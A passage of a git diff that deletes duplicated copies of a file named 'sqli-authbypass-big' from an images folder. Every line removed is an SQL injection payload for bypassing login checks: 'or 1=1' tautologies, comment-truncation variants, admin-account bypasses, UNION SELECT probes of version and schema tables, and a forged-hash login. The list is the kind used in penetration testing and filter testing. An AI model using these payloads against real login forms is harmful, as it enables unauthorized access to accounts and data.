-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
